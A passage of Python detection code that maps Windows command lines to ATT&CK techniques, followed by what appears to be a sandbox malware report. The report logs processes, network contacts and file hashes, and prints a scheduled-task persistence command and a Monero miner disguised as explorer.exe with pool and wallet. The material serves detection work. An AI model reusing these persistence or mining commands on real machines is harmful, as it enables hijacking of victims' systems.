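HOSTED_URL = re.compile(r"https?://(?:[\w-]+\.)*(iplogger\.org|pastebin\.com|raw\.githubusercontent\.com)/", re.I)

RULES: List[Rule] = [
    Rule("T1059.003", "cmd.exe /c launching a hex-named dropper",
         lambda img, cmd: HEX_DROPPER.search(cmd) is not None),
    Rule("T1059.001", "PowerShell invoked with arguments",
         lambda img, cmd: _stem(img) == "powershell" and len(cmd.split()) > 1),
    Rule("T1053.005", "on-logon task, highest run level, action under AppData",
         lambda img, cmd: _has(cmd, "schtasks", "/create", "/sc onlogon", "/rl highest", "/tr", "\\appdata\\")),
    Rule("T1562.001", "Microsoft Defender exclusion added via Add-MpPreference",
         lambda img, cmd: _has(cmd, "add-mppreference", "-exclusionpath")),
    Rule("T1102", "URL on a tracking or paste service",
         lambda img, cmd: HOSTED_URL.search(cmd) is not None),
    Rule("T1036", "process image does not match the executable in its command line",
         lambda img, cmd: _stem(img) != _stem(first_token(cmd))),
]


def evaluate(image: str, cmdline: str) -> List[str]:
    """Technique IDs of every rule that fires, in rule order."""
    return [r.technique for r in RULES if r.match(image, cmdline)]


def triage(processes):
    """Per-process hits (image basename, techniques) plus a technique histogram."""
    hits, histogram = [], {}
    for image, cmdline in processes:
        techs = evaluate(image, cmdline)
        hits.append((ntpath.basename(image), techs))
        for t in techs:
            histogram[t] = histogram.get(t, 0) + 1
    return hits, histogram


# Ten-digit stand-alone arguments in the 2017..2033 Unix-time range.
UNIX_TS = re.compile(r"(?<![\w.])(1[5-9]\d{8})(?![\w.])")


def unix_timestamp_args(cmdline: str) -> List[Tuple[int, str]]:
    """Render timestamp-looking arguments as UTC; the winnetdriv.exe launch passes
    its own install time this way."""
    return [(int(m.group(1)),
             datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"))
            for m in UNIX_TS.finditer(cmdline)]


if __name__ == "__main__":
    for name, techs in triage(PROCESSES)[0]:
        print(f"{name:20} {', '.join(techs) or '-'}")
    print(unix_timestamp_args(PROCESSES[1][1]))
```

The T1036 rule is the one that needs the caveat built into _stem: comparing full paths would flag every 32-bit cmd.exe and powershell.exe launch in this list as a mismatch, because WOW64 reports the SysWOW64 image for a system32 command line, while comparing only the executable name still catches winnetdriv.exe running with setup.exe's command line.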

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb24c746f8,0x7ffb24c74708,0x7ffb24c74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8191670427758221600,16487741559823512812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 41.13.2.23.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
N/A 127.0.0.1:63098 tcp
N/A 127.0.0.1:63100 tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
DE 51.195.43.17:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 pastebin.com udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 17.43.195.51.in-addr.arpa udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 146.59.154.106:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 106.154.59.146.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3016-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-44-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-43-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-38-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-36-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-34-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3016-33-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3016-32-0x00000000013F0000-0x000000000147F000-memory.dmp

memory/3016-31-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3016-27-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

memory/4800-97-0x0000000000F60000-0x0000000000F8C000-memory.dmp

memory/3252-100-0x00000000002F0000-0x00000000003DE000-memory.dmp

memory/4800-103-0x0000000003110000-0x0000000003130000-memory.dmp

memory/1000-104-0x0000000000800000-0x0000000000942000-memory.dmp

memory/1000-107-0x0000000005260000-0x00000000052F2000-memory.dmp

memory/1000-106-0x0000000005770000-0x0000000005D14000-memory.dmp

memory/4800-105-0x0000000003140000-0x0000000003146000-memory.dmp

memory/1000-108-0x0000000005200000-0x000000000520A000-memory.dmp

memory/1000-109-0x0000000005590000-0x000000000562C000-memory.dmp

memory/4800-99-0x0000000003100000-0x0000000003106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
SHA256 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e
SHA512 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

memory/4876-80-0x0000000000A70000-0x0000000000A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

MD5 ad0aca1934f02768fd5fedaf4d9762a3
SHA1 0e5b8372015d81200c4eff22823e854d0030f305
SHA256 dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388
SHA512 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 01ad10e59fa396af2d5443c5a14c1b21
SHA1 f209a4f0bb2a96e3ee6a55689e7f00e79c04f722
SHA256 bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137
SHA512 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02

memory/1320-129-0x00000000020A0000-0x0000000002184000-memory.dmp

memory/1004-120-0x0000000000CA0000-0x0000000000CB0000-memory.dmp

memory/3640-143-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/3016-150-0x0000000000400000-0x0000000000A07000-memory.dmp

memory/3016-159-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3016-158-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3016-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3016-156-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3016-154-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3312-160-0x0000000000400000-0x00000000032F3000-memory.dmp

memory/1000-161-0x0000000004CB0000-0x0000000004CC2000-memory.dmp

memory/2380-171-0x0000000000400000-0x0000000003346000-memory.dmp

memory/3640-172-0x0000000000770000-0x000000000084D000-memory.dmp

memory/1004-175-0x0000000001A90000-0x0000000001AA2000-memory.dmp

memory/1004-174-0x0000000001A60000-0x0000000001A6E000-memory.dmp

memory/1000-188-0x000000000A2A0000-0x000000000A32C000-memory.dmp

memory/1000-189-0x0000000006F20000-0x0000000006F3E000-memory.dmp

memory/4760-190-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
